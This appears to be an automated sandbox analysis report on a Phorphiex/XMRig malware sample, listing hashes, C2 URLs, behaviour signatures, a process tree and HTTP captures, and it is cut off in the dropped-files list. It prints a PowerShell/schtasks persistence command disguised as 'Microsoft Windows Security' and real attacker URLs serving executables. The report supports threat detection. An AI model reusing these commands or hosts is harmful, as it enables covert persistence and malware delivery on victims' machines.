Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241023-en, locale:en-us, os:windows7-x64, system
  • submitted
    05-12-2024 08:04

General

  • Target

    8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe

  • Size

    447KB

  • MD5

    d5d3129db24df5cccdb15ea1f5cbd119

  • SHA1

    67e1bd36976019766d2f4e8cc02be8935001c661

  • SHA256

    8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160

  • SHA512

    74dca8888ffc584e1e56b4644e71b0941f06825ff2542edbe4196fda3f540e8b5d8a39c047aed7707c80be975802133e88769efdfc65e99f363fe96d73b9dea5

  • SSDEEP

    6144:QLPnZC2bLwAMEDMrHDxn1pyvGp3wCat3SluW3DMSHMRdpwWDYql4qRFT5P5GD:Q7nZ1fgrjBryvlSlu4M/0WsqlbxU

Malware Config

Extracted

Family

phorphiex

C2

http://185.215.113.66/

http://91.202.233.141/

Wallets


Attributes
  • mutex

    753f85d83d

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

Extracted

Family

phorphiex

C2

http://twizt.net

http://185.215.113.84

Signatures

  • Phorphiex family
  • Phorphiex payload 1 IoCs
  • Phorphiex, Phorpiex

    Phorphiex (also spelled Phorpiex) is a malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 8 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials, among other things.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Uses the powershell.exe command.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1188
      • C:\Users\Admin\AppData\Local\Temp\8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe
        "C:\Users\Admin\AppData\Local\Temp\8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe"
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1236
        • C:\Users\Admin\AppData\Local\Temp\BD85.exe
          "C:\Users\Admin\AppData\Local\Temp\BD85.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1084
          • C:\Users\Admin\AppData\Local\Temp\3278622590.exe
            C:\Users\Admin\AppData\Local\Temp\3278622590.exe
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2764
            • C:\Windows\sysnldcvmr.exe
              C:\Windows\sysnldcvmr.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2792
              • C:\Users\Admin\AppData\Local\Temp\2986423650.exe
                C:\Users\Admin\AppData\Local\Temp\2986423650.exe
                6⤵
                • Executes dropped EXE
                PID:2684
              • C:\Users\Admin\AppData\Local\Temp\2127311717.exe
                C:\Users\Admin\AppData\Local\Temp\2127311717.exe
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2508
                • C:\Users\Admin\AppData\Local\Temp\3084034625.exe
                  C:\Users\Admin\AppData\Local\Temp\3084034625.exe
                  7⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2884
              • C:\Users\Admin\AppData\Local\Temp\1268232551.exe
                C:\Users\Admin\AppData\Local\Temp\1268232551.exe
                6⤵
                • Executes dropped EXE
                PID:3016
              • C:\Users\Admin\AppData\Local\Temp\2594321231.exe
                C:\Users\Admin\AppData\Local\Temp\2594321231.exe
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1184
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1180
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2592
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
        2⤵
          PID:2512
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1124
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:944
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe
          2⤵
            PID:2092
          • C:\Windows\System32\dwm.exe
            C:\Windows\System32\dwm.exe
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:2984
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {A51A4541-467A-4165-9FF3-F69C21B443AD} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1600
          • C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
            "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2568

        Network

        • flag-ru
          GET
          http://185.215.113.66/32.exe
          8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /32.exe HTTP/1.1
          Accept: */*
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
          Host: 185.215.113.66
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:04:38 GMT
          Content-Type: application/octet-stream
          Content-Length: 10240
          Last-Modified: Thu, 28 Nov 2024 09:15:33 GMT
          Connection: keep-alive
          ETag: "674834b5-2800"
          Accept-Ranges: bytes
        • flag-us
          DNS
          twizt.net
          BD85.exe
          Remote address:
          8.8.8.8:53
          Request
          twizt.net
          IN A
          Response
          twizt.net
          IN A
          185.215.113.66
        • flag-ru
          GET
          http://twizt.net/newtpp.exe
          BD85.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /newtpp.exe HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
          Host: twizt.net
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:04:41 GMT
          Content-Type: application/octet-stream
          Content-Length: 80896
          Last-Modified: Tue, 12 Nov 2024 22:30:51 GMT
          Connection: keep-alive
          ETag: "6733d71b-13c00"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://twizt.net/peinstall.php
          BD85.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /peinstall.php HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
          Host: twizt.net
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:04:43 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-ru
          GET
          http://185.215.113.66/1
          sysnldcvmr.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /1 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 185.215.113.66
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:04:50 GMT
          Content-Type: application/octet-stream
          Content-Length: 9472
          Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT
          Connection: keep-alive
          ETag: "674f01b0-2500"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.66/1
          sysnldcvmr.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /1 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 185.215.113.66
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:04:51 GMT
          Content-Type: application/octet-stream
          Content-Length: 9472
          Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT
          Connection: keep-alive
          ETag: "674f01b0-2500"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.66/2
          sysnldcvmr.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /2 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 185.215.113.66
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:04:56 GMT
          Content-Type: application/octet-stream
          Content-Length: 10496
          Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
          Connection: keep-alive
          ETag: "67154d18-2900"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.66/2
          sysnldcvmr.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /2 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 185.215.113.66
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:04:57 GMT
          Content-Type: application/octet-stream
          Content-Length: 10496
          Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
          Connection: keep-alive
          ETag: "67154d18-2900"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.66/3
          sysnldcvmr.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /3 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 185.215.113.66
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:02 GMT
          Content-Type: application/octet-stream
          Content-Length: 55040
          Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT
          Connection: keep-alive
          ETag: "674b357a-d700"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.84/nxmr.exe
          2127311717.exe
          Remote address:
          185.215.113.84:80
          Request
          GET /nxmr.exe HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
          Host: 185.215.113.84
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:02 GMT
          Content-Type: application/octet-stream
          Content-Length: 5827584
          Last-Modified: Fri, 27 Sep 2024 20:03:46 GMT
          Connection: keep-alive
          ETag: "66f70fa2-58ec00"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.66/3
          sysnldcvmr.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /3 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 185.215.113.66
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:04 GMT
          Content-Type: application/octet-stream
          Content-Length: 55040
          Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT
          Connection: keep-alive
          ETag: "674b357a-d700"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.66/4
          sysnldcvmr.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /4 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 185.215.113.66
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:09 GMT
          Content-Type: application/octet-stream
          Content-Length: 63232
          Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
          Connection: keep-alive
          ETag: "67497f08-f700"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.66/4
          sysnldcvmr.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /4 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 185.215.113.66
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:10 GMT
          Content-Type: application/octet-stream
          Content-Length: 63232
          Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
          Connection: keep-alive
          ETag: "67497f08-f700"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.66/5
          sysnldcvmr.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /5 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 185.215.113.66
          Response
          HTTP/1.1 404 Not Found
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:16 GMT
          Content-Type: text/html
          Content-Length: 564
          Connection: keep-alive
        • flag-tm
          GET
          http://91.202.233.141/IBSTSWSONL
          2594321231.exe
          Remote address:
          91.202.233.141:80
          Request
          GET /IBSTSWSONL HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
          Host: 91.202.233.141
          Response
          HTTP/1.1 404 Not Found
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:15 GMT
          Content-Type: text/html
          Content-Length: 564
          Connection: keep-alive
        • flag-tm
          GET
          http://91.202.233.141/1
          sysnldcvmr.exe
          Remote address:
          91.202.233.141:80
          Request
          GET /1 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 91.202.233.141
          Response
          HTTP/1.1 404 Not Found
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:19 GMT
          Content-Type: text/html
          Content-Length: 564
          Connection: keep-alive
        • flag-tm
          GET
          http://91.202.233.141/2
          sysnldcvmr.exe
          Remote address:
          91.202.233.141:80
          Request
          GET /2 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 91.202.233.141
          Response
          HTTP/1.1 404 Not Found
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:21 GMT
          Content-Type: text/html
          Content-Length: 564
          Connection: keep-alive
        • flag-tm
          GET
          http://91.202.233.141/3
          sysnldcvmr.exe
          Remote address:
          91.202.233.141:80
          Request
          GET /3 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 91.202.233.141
          Response
          HTTP/1.1 404 Not Found
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:23 GMT
          Content-Type: text/html
          Content-Length: 564
          Connection: keep-alive
        • flag-tm
          GET
          http://91.202.233.141/4
          sysnldcvmr.exe
          Remote address:
          91.202.233.141:80
          Request
          GET /4 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 91.202.233.141
          Response
          HTTP/1.1 404 Not Found
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:25 GMT
          Content-Type: text/html
          Content-Length: 564
          Connection: keep-alive
        • flag-tm
          GET
          http://91.202.233.141/5
          sysnldcvmr.exe
          Remote address:
          91.202.233.141:80
          Request
          GET /5 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 91.202.233.141
          Response
          HTTP/1.1 404 Not Found
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:28 GMT
          Content-Type: text/html
          Content-Length: 564
          Connection: keep-alive
        • flag-us
          DNS
          twizthash.net
          dwm.exe
          Remote address:
          8.8.8.8:53
          Request
          twizthash.net
          IN A
          Response
          twizthash.net
          IN A
          185.215.113.66
        • flag-us
          DNS
          www.update.microsoft.com
          sysnldcvmr.exe
          Remote address:
          8.8.8.8:53
          Request
          www.update.microsoft.com
          IN A
          Response
          www.update.microsoft.com
          IN CNAME
          redir.update.msft.com.trafficmanager.net
          redir.update.msft.com.trafficmanager.net
          IN A
          20.109.209.108
        • 185.215.113.66:80
          http://185.215.113.66/32.exe
          http
          8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe
          687 B
          10.9kB
          8
          10

          HTTP Request

          GET http://185.215.113.66/32.exe

          HTTP Response

          200
        • 185.215.113.66:80
          http://twizt.net/peinstall.php
          http
          BD85.exe
          2.2kB
          83.9kB
          41
          64

          HTTP Request

          GET http://twizt.net/newtpp.exe

          HTTP Response

          200

          HTTP Request

          GET http://twizt.net/peinstall.php

          HTTP Response

          200
        • 185.215.113.66:80
          http://185.215.113.66/1
          http
          sysnldcvmr.exe
          622 B
          10.2kB
          10
          11

          HTTP Request

          GET http://185.215.113.66/1

          HTTP Response

          200
        • 185.215.113.66:80
          http://185.215.113.66/2
          http
          sysnldcvmr.exe
          970 B
          21.3kB
          14
          19

          HTTP Request

          GET http://185.215.113.66/1

          HTTP Response

          200

          HTTP Request

          GET http://185.215.113.66/2

          HTTP Response

          200
        • 185.215.113.66:80
          http://185.215.113.66/3
          http
          sysnldcvmr.exe
          1.9kB
          53.1kB
          35
          41

          HTTP Request

          GET http://185.215.113.66/2

          HTTP Response

          200

          HTTP Request

          GET http://185.215.113.66/3

          HTTP Response

          200
        • 185.215.113.84:80
          http://185.215.113.84/nxmr.exe
          http
          2127311717.exe
          127.5kB
          6.0MB
          2606
          4297

          HTTP Request

          GET http://185.215.113.84/nxmr.exe

          HTTP Response

          200
        • 185.215.113.66:80
          http://185.215.113.66/4
          http
          sysnldcvmr.exe
          2.2kB
          79.4kB
          41
          60

          HTTP Request

          GET http://185.215.113.66/3

          HTTP Response

          200

          HTTP Request

          GET http://185.215.113.66/4

          HTTP Response

          200
        • 185.215.113.66:80
          http://185.215.113.66/5
          http
          sysnldcvmr.exe
          1.9kB
          66.3kB
          34
          52

          HTTP Request

          GET http://185.215.113.66/4

          HTTP Response

          200

          HTTP Request

          GET http://185.215.113.66/5

          HTTP Response

          404
        • 91.202.233.141:80
          http://91.202.233.141/IBSTSWSONL
          http
          2594321231.exe
          362 B
          860 B
          4
          3

          HTTP Request

          GET http://91.202.233.141/IBSTSWSONL

          HTTP Response

          404
        • 91.202.233.141:80
          http://91.202.233.141/5
          http
          sysnldcvmr.exe
          1.4kB
          4.0kB
          13
          8

          HTTP Request

          GET http://91.202.233.141/1

          HTTP Response

          404

          HTTP Request

          GET http://91.202.233.141/2

          HTTP Response

          404

          HTTP Request

          GET http://91.202.233.141/3

          HTTP Response

          404

          HTTP Request

          GET http://91.202.233.141/4

          HTTP Response

          404

          HTTP Request

          GET http://91.202.233.141/5

          HTTP Response

          404
        • 185.215.113.66:5152
          twizthash.net
          dwm.exe
          1.1kB
          3.7kB
          12
          11
        • 20.109.209.108:80
          www.update.microsoft.com
          sysnldcvmr.exe
          144 B
          92 B
          3
          2
        • 213.230.126.169:40500
          sysnldcvmr.exe
          152 B
          3
        • 46.100.82.131:40500
          sysnldcvmr.exe
          152 B
          3
        • 94.51.68.160:40500
          sysnldcvmr.exe
          152 B
          3
        • 8.8.8.8:53
          twizt.net
          dns
          BD85.exe
          55 B
          71 B
          1
          1

          DNS Request

          twizt.net

          DNS Response

          185.215.113.66

        • 8.8.8.8:53
          twizthash.net
          dns
          dwm.exe
          59 B
          75 B
          1
          1

          DNS Request

          twizthash.net

          DNS Response

          185.215.113.66

        • 8.8.8.8:53
          www.update.microsoft.com
          dns
          sysnldcvmr.exe
          70 B
          140 B
          1
          1

          DNS Request

          www.update.microsoft.com

          DNS Response

          20.109.209.108

        • 90.156.163.33:40500
          sysnldcvmr.exe
          64 B
          1
        • 77.81.130.60:40500
          sysnldcvmr.exe
          64 B
          1
        • 90.156.161.82:40500
          sysnldcvmr.exe
          64 B
          1
        • 46.100.164.239:40500
          sysnldcvmr.exe
          64 B
          1
        • 2.190.242.182:40500
          sysnldcvmr.exe
          64 B
          1
        • 217.30.162.37:40500
          sysnldcvmr.exe
          64 B
          1
        • 189.230.99.20:40500
          sysnldcvmr.exe
          64 B
          1
        • 195.158.15.3:40500
          sysnldcvmr.exe
          64 B
          1
        • 84.240.235.134:40500
          sysnldcvmr.exe
          64 B
          1
        • 95.212.120.220:40500
          sysnldcvmr.exe
          64 B
          1
        • 5.76.0.203:40500
          sysnldcvmr.exe
          64 B
          1
        • 151.241.114.78:40500
          sysnldcvmr.exe
          64 B
          1
        • 2.191.61.218:40500
          sysnldcvmr.exe
          64 B
          1

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\BD85.exe

          Filesize

          10KB

          MD5

          8ce09f13942ab5bcb81b175996c8385f

          SHA1

          6fa685d66ac5fff4e9d984dc1903c47a1a6b6cbd

          SHA256

          757bf8be40693456e7cdee5c53416d1cb223da5f7d0b9d55f4aca95f6a57605d

          SHA512

          11ae4651b3dd55355b2cb7bf2f6b042dea47bb895f898d967d63ee652652c633cc5becf31cb2fd7f8797b238b264195d09d4e08211b797eae29e2a7bb31b277f

        • C:\Users\Admin\AppData\Local\Temp\Setup_20241205080437_Failed.txt

          Filesize

          745B

          MD5

          8173b6b8d13317cfd59904e50ed1a5ea

          SHA1

          eac71a4715c26c59f215f56cf28ed74b1210ceca

          SHA256

          bdda60acdd87a63edc1f37dc397549180547a9b5130e74ac4304dd95ed2717ae

          SHA512

          7745c8ddcf34125a011da5262c3b046848acfa18fe18d4df987746d201778f84b0b313042bdc2b362054fcd7db94719615fa0bdb1aab2308480a0e70f33174fc

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          ff293aed5505000cab8831784b853ae2

          SHA1

          53f50192a408a614142372b24a9a012c3681d25e

          SHA256

          23ad28d972d27aff848463f9ab8e88d5d32cce98398d5fed052f6018536f2db3

          SHA512

          c041aa5f737bd4da015372efea6af664c4a4d2bb931ca75255dbdab3d31d50f6d04ccfbc99107e15186316492ae7d3768bc35d6689019ab4286911d2b9a6ecf1

        • \Users\Admin\AppData\Local\Temp\1268232551.exe

          Filesize

          53KB

          MD5

          84897ca8c1aa06b33248956ac25ec20a

          SHA1

          544d5d5652069b3c5e7e29a1ca3eea46b227bbfe

          SHA256

          023ad16f761a35bd7934e392bcf2bbf702f525303b2964e97c3e50d2d5f3eda1

          SHA512

          c17d0e364cf29055dece3e10896f0bbd0ebdb8d2b1c15fe68ddcd9951dd2d1545362f45ad21f26302f3da2eb2ec81340a027cbd4c75cc28491151ecabae65e95

        • \Users\Admin\AppData\Local\Temp\2127311717.exe

          Filesize

          10KB

          MD5

          96509ab828867d81c1693b614b22f41d

          SHA1

          c5f82005dbda43cedd86708cc5fc3635a781a67e

          SHA256

          a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744

          SHA512

          ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca

        • \Users\Admin\AppData\Local\Temp\2594321231.exe

          Filesize

          61KB

          MD5

          77c5eb90118287f666886fc34210c176

          SHA1

          d7a59bf4f014304e29df1868ef82fe782432120a

          SHA256

          59a96d66d97e202829ea79a5e0bbf71981c05a13ab700b0120f7d99d33515080

          SHA512

          5577d167ad4748ad7917ff3f792a0caa01ba40638bdf7143c1403d2efcad4019f8da49719ae0ad88febdc1ef64207fba7ca5bb96dc12c334571d30e2e8f22cf9

        • \Users\Admin\AppData\Local\Temp\2986423650.exe

          Filesize

          9KB

          MD5

          323cb4364490f83204b51b0f7f3766f4

          SHA1

          8687a571d083ffef105d0ce61d46845b4dba4793

          SHA256

          efade1639d80b3262d0730a70525dbd703ab51499291b3a1c55b2aa32e74030e

          SHA512

          96a5470e361ee1a164bb637e1bc14434050cbf12d3d3bcae240575d08270dc8038582965cddde508c220ec6aa695dfc87d0633f6735ec3d6e637c4cb25b42a3d

        • \Users\Admin\AppData\Local\Temp\3084034625.exe

